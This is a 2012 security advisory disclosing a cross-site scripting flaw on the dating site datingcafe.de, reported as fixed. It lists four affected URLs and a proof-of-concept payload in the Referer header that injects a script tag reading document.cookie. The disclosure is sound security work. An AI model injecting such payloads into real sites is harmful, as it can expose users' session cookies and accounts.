Advisory:		www.datingcafe.de - Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2012-027
Author:			Stefan Schurtz
Affected Software:	Successfully tested on www.datingcafe.de
Vendor URL:		http://www.datingcafe.de
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

http://www.datingcafe.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

http://www.datingcafe.de/DatingCafe/dc/allgemein/dating_cafe_kontakt
http://www.datingcafe.de/DatingCafe/
http://www.datingcafe.de/DatingCafe/member/newPasswordSendForm
http://www.datingcafe.de/DatingCafe/dc/hilfe/hilfe_uebersicht

Referer: '"></style></noscript><script>alert(document.cookie)</script>

==========================
Solution
==========================

seems to be fixed

==========================
Disclosure Timeline
==========================

05-Jan-2012 - informed by contact form

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-027.txt